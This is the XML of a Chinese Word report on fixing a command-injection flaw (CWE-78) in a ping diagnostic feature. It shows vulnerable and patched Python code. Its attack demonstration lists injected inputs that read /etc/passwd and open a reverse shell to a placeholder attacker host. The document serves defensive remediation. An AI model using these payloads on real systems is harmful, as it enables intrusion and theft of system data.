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6"/>
        </w:rPr>
        <w:t>用户信息管理系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>命令注入漏洞修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本：v9.0.0-secure  2026年07月26日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>新增的Ping网络诊断功能存在命令注入漏洞，攻击者可在IP输入框中拼接系统命令并执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞清单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CWE编号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漏洞位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令注入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CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping POST line 453-494</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、命令注入漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞信息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命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping 路由 POST处理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🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CWE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CWE-78: OS命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping功能使用f-string拼接用户输入的ip到系统命令，并设置shell=True，攻击者在IP输入框输入特殊字符（;、&amp;&amp;、|）可拼接执行任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>攻击演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>输入 127.0.0.1; whoami → 显示当前用户身份</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>输入 127.0.0.1; id → 显示 uid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>输入 127.0.0.1; cat /etc/passwd → 读取系统密码文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>输入 127.0.0.1; bash -i &gt;&amp; /dev/tcp/attacker/4444 0&gt;&amp;1 → 反弹Shell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ip = request.form.get("ip", "")</w:t>
        <w:br/>
        <w:t># 🔴 f-string 拼接命令</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t># 🔴 shell=True 允许执行任意命令</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(cmd, shell=True)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safe_ip = shlex.quote(ip.strip())</w:t>
        <w:br/>
        <w:t># ✅ 参数列表形式传递，shell=False</w:t>
        <w:br/>
        <w:t>cmd = ["ping", "-c", "3", safe_ip]</w:t>
        <w:br/>
        <w:t># ✅ 不经过shell解析，无法注入</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(cmd, shell=False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、修复措施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shlex.quote()过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>对用户输入进行安全转义，特殊字符被加引号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shell=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>禁止通过shell解析命令，参数以列表传递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参数列表化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令和参数分开传递，避免注入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</w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、命令注入防御总结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shell=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>永远不要设置shell=True执行命令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shlex.quote()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>对用户输入进行安全转义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白名单过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>只允许数字、点号、减号等IP字符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最小权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>应用使用非root用户运行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命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>使用第三方库的API替代系统命令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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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